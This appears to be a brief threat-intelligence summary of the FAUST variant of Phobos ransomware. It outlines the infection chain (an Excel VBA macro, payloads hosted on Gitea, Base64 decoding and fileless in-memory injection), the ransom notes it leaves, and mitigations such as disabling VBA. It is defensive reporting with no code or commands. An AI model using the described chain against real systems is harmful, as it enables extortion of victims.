FortiGuard Labs has recently discovered a new variant of the Phobos ransomware family called FAUST. This variant is particularly concerning due to its ability to maintain persistence within a network environment and efficiently encrypt files across a network.


The FAUST ransomware spreads through a Microsoft Excel document that contains a Visual Basic (VBA) script. It utilizes the Gitea service to store malicious files [1] [2] [3] [4] [5] [6], which are then encoded in Base64 and injected into a system’s memory to initiate a file encryption attack [2] [3] [6]. The analysis of this attack has revealed a multi-stage flow, starting from the execution of the VBA script and culminating in the deployment of the FAUST payload. The FAUST variant is particularly sophisticated as it employs a fileless attack method and can persistently embed itself within a network [4].

The Phobos ransomware family [1] [2] [3] [4] [5] [6], which includes variants like Eking [1], Eight [1], Elbie [1], Devos [1], and 8Base [1], has been involved in numerous cyberattacks since 2019 [4]. Typically, this ransomware appends encrypted files with a unique extension and demands a ransom payment in cryptocurrency [4]. In the case of FAUST, it appends a “faust” extension to encrypted files and leaves behind info.txt and info.hta files for ransom negotiations [7].


To effectively mitigate the threat posed by FAUST and other variants of the Phobos ransomware family, organizations have several options. They can disable VBA in Microsoft Office or utilize Windows Defense Attack Surface Reduction to disable high-risk functionality in VBAs [5]. It is also recommended to implement advanced cybersecurity strategies, regularly update software, provide employee training [4], and have comprehensive security systems in place. Additionally, users are advised to exercise caution when opening documents from untrusted sources to protect against ransomware threats [7]. The discovery of FAUST highlights the need for ongoing vigilance and proactive measures to combat evolving cyber threats.